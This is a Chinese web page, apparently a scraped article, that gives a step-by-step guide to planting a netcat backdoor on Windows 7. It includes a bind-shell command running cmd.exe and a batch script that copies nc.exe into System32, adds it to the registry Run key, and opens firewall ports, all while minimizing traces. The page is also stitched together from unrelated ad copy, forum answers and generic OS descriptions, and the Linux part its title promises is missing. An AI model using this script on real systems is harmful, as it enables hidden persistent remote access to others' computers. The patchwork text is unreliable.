如何在Windows，Linux中安裝后門

0×00 準(zhǔn)備工作

創(chuàng)新互聯(lián)公司專注于網(wǎng)站建設(shè)|成都網(wǎng)站改版|優(yōu)化|托管以及網(wǎng)絡(luò)推廣，積累了大量的網(wǎng)站設(shè)計與制作經(jīng)驗，為許多企業(yè)提供了網(wǎng)站定制設(shè)計服務(wù)，案例作品覆蓋成都混凝土泵車等行業(yè)。能根據(jù)企業(yè)所處的行業(yè)與銷售的產(chǎn)品，結(jié)合品牌形象的塑造，量身設(shè)計品質(zhì)網(wǎng)站。

假設(shè)用戶以管理員權(quán)限登錄系統(tǒng)，在Windows 7系統(tǒng)上使用netcat 創(chuàng)建一個后門。

Netcat 功能比較單一, 缺少了許多我們滲透工作中需要的功能。為此我們將創(chuàng)建一個便攜式的工具包來解決這個問題 :

1.下載額外的文件和附加持續(xù).

2.編輯修改指定文件.

3.快速創(chuàng)建執(zhí)行后門.

4.控制遠(yuǎn)程服務(wù)器并進行惡作劇 ：）

為了便于你第一時間獲取到你的工具包，你需要將它放置在一個獨立的U盤或者在線服務(wù)器上。

便攜式工具(Portable Applications)

便攜式工具是那些不需要安裝就能直接使用的程序，它們往往將所有的執(zhí)行環(huán)境和核心程序本身一同打包成一個獨立的文件，方便攜帶。在獨立文件執(zhí)行的過程中會自行釋放額的需求文件，并構(gòu)建一個可順利執(zhí)行目標(biāo)程序的環(huán)境。

1.不依賴特定的dll(dll已經(jīng)打包)

2.不依賴注冊表設(shè)置(有可能自行初始化) ，不遺留下任何注冊表操作痕跡

3.操作痕跡最小化，盡量避免一切不必要的操作，導(dǎo)致留下過多的系統(tǒng)操作記錄

創(chuàng)建 Windows 7 工具集

gVim (跨平臺的文本編輯器, 提供強大的命令行操作交互)

Wget (下載 windows 64 位版本)

Netcat

有Kali系統(tǒng)的可以用命令 “find / -name nc.exe”搜索到 或者下載已經(jīng)編譯好的版本

0×01初試 Netcat 后門

nc.exe -dLp 449 -e cmd.exe -L 這個選項會開啟一個監(jiān)聽服務(wù)并等待客戶端連接， 在客戶端連接成功之后，會提供相應(yīng)的交互服務(wù)。

– p 指定程序監(jiān)聽的端口(非管理員權(quán)限只能設(shè)置高于1024的端口. 同時不可復(fù)用現(xiàn)有端口)

– e 在接收到一個客戶端連接后, 會執(zhí)行一個特定的程序(這里是cmd.exe), 這個程序負(fù)責(zé)接下來的會話交互(執(zhí)行客戶端后期提交的任何命令)

– d 采取靜默監(jiān)聽模式，避免nc運行過程中，產(chǎn)生過多額外的日志信息

Windows 7 后門安裝批處理腳本

@echo off

Rem 拷貝文件到系統(tǒng)目錄

xcopy "%systemdrive%\%username%\Desktop\nc.exe" "C:

\Windows\System32\" -y

Rem 修改注冊表，增加后門自啟動代碼.

reg add "HKLM\software\microsoft\windows\currentversion\run" /f /v "system" /t

REG_SZ /d "C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe"

Rem 添加防火墻規(guī)則，開放監(jiān)聽的449端口，允許外部連接.

netsh advfirewall firewall add rule name="Rule 34" dir=in action=allow

protocol=UDP localport=449

netsh advfirewall firewall add rule name="Rule 35" dir=in action=allow

protocol=TCP localport=449

Rem 添加防火墻規(guī)則，允許nc.exe對外提供連接.

netsh advfirewall firewall add rule name="Allow Messenger" dir=in action=allow

program="C:\windows\system32\nc.exe"

微軟是否在windows 下留有后門

沒有，說有的基本上都不了解windows，鍵盤俠居多。windows是半開源操作系統(tǒng)，其實你向微軟申請是可以看見源碼的(linux完全不用，osx申請也不給你看)，有沒有后門是可以檢測的。還有windows的驅(qū)動方式很特別，是獨立驅(qū)動，相當(dāng)于windows這個大系統(tǒng)，帶著一堆小系統(tǒng)玩，也就是你自己寫一個網(wǎng)卡驅(qū)動，所有網(wǎng)絡(luò)行為都會收到你自己監(jiān)控，windows無權(quán)干涉，有沒有后門，弄一弄就知道了(這也是windows動不動硬件兼容藍(lán)屏的原因，穩(wěn)定性會受到硬件廠商驅(qū)動好壞影響)。微軟想在windows里面植入后門難得非常大。相反osx相當(dāng)容易，源碼不公開，驅(qū)動又是內(nèi)核方式(鬼知道蘋果做了什么)。

微軟的WINDOWS系統(tǒng)有沒有“后門”啊？

WINDOWS系統(tǒng)沒有“后門” 全球幾億雙眼睛都盯著他呢 它也不需要后門 只要他隨便在安全更新里加點什么 就可以了～～～

Windows系統(tǒng)的后門有什么？不要說沒有。記得當(dāng)年破解的Windows系統(tǒng)，還可以被微軟控制。

Windows系統(tǒng)Windows操作系統(tǒng)是一款由美國微軟公司開發(fā)的窗口化操作系統(tǒng)。采用了GUI圖形化操作模式，比起從前的指令操作系統(tǒng)如DOS更為人性化。Windows操作系統(tǒng)是目前世界上使用最廣泛的操作系統(tǒng)。最新的版本是Windows8。Unix系統(tǒng)Unix系統(tǒng)是1969年在貝爾實驗室誕生，最初是在中小型計算機上運用。最早移植到80286微機上的Unix系統(tǒng)，稱為Xenix。Xenix系統(tǒng)的特點是短小精干，系統(tǒng)開銷小，運行速度快。UNIX為用戶提供了一個分時的系統(tǒng)以控制計算機的活動和資源，并且提供一個交互，靈活的操作界。UNIX被設(shè)計成為能夠同時運行多進程，支持用戶之間共享數(shù)據(jù)。同時，UNIX支持模塊化結(jié)構(gòu)，當(dāng)你安裝UNIX操作系統(tǒng)時，你只需要安裝你工作需要的部分，例如：UNIX支持許多編程開發(fā)工具，但是如果你并不從事開發(fā)工作，你只需要安裝最少的編譯器。用戶界面同樣支持模塊化原則，互不相關(guān)的命令能夠通過管道相連接用于執(zhí)行非常復(fù)雜的操作。UNIX有很多種，許多公司都有自己的版本，如ATT、Sun、HP等Netware系統(tǒng)Netware是NOVELL公司推出的網(wǎng)絡(luò)操作系統(tǒng)。Netware最重要的特征是基于基本模塊設(shè)計思想的開放式系統(tǒng)結(jié)構(gòu)。Netware是一個開放的網(wǎng)絡(luò)服務(wù)器平臺，可以方便地對其進行擴充。Netware系統(tǒng)對不同的工作平臺(如D0S、0S/2、Macintosh等)，不同的網(wǎng)絡(luò)協(xié)議環(huán)境如TCP/IP以及各種工作站操作系統(tǒng)提供了一致的服務(wù)。該系統(tǒng)內(nèi)可以增加自選的擴充服務(wù)(如替補備份、數(shù)據(jù)庫、電子郵件以及記賬等)，這些服務(wù)可以取自Netware本身，也可取自第三方開發(fā)者。Linux系統(tǒng)Linux是一種自由和開放源碼的類Unix操作系統(tǒng)，存在著許多不同的Linux版本，但它們都使用了Linux內(nèi)核。Linux可安裝在各種計算機硬件設(shè)備中，比如手機、平板電腦、路由器、視頻游戲控制臺、臺式計算機、大型機和超級計算機。Linux是一個領(lǐng)先的操作系統(tǒng)，世界上運算最快的10臺超級計算機運行的都是Linux操作系統(tǒng)。嚴(yán)格來講，Linux這個詞本身只表示Linux內(nèi)核，但實際上人們已經(jīng)習(xí)慣了用Linux來形容整個基于Linux內(nèi)核，并且使用GNU工程各種工具和數(shù)據(jù)庫的操作系統(tǒng)。Mac系統(tǒng)MacOS操作系統(tǒng)是美國蘋果計算機公司為它的Macintosh計算機設(shè)計的操作系統(tǒng)的一代操作系統(tǒng)，該機型于1984年推出，在當(dāng)時的PC還只是DOS枯燥的字符界面的時候，Mac率先采用了一些我們至今仍為人稱道的技術(shù)。比如：GUI圖形用戶界面、多媒體應(yīng)用、鼠標(biāo)等，Macintosh計算機在出版、印刷、影視制作和教育等領(lǐng)域有著廣泛的應(yīng)用，MicrosoftWindows至今在很多方面還有Mac的影子，最近蘋果公司又發(fā)布了目前最先進的個人電腦操作系統(tǒng)MacOSX

Windows系統(tǒng)有后門嗎？

后門？？？如果你的電腦沒有被入侵過就肯定不會有后門，后門一般是入侵者在系統(tǒng)中留下的惡意程序，以便下次入侵使用。

不過漏洞倒是任何系統(tǒng)都存在的，無論它的安全性都多高，都會伴隨著一定的漏洞。

可從以下哪幾方面審計windows系統(tǒng)是否存在后門

1、可以從查看服務(wù)信息審計。

2、可以從查看驅(qū)動信息審計。

3、可以從查看注冊表鍵值審計。

4、可以從查看系統(tǒng)日志審計等方面審計。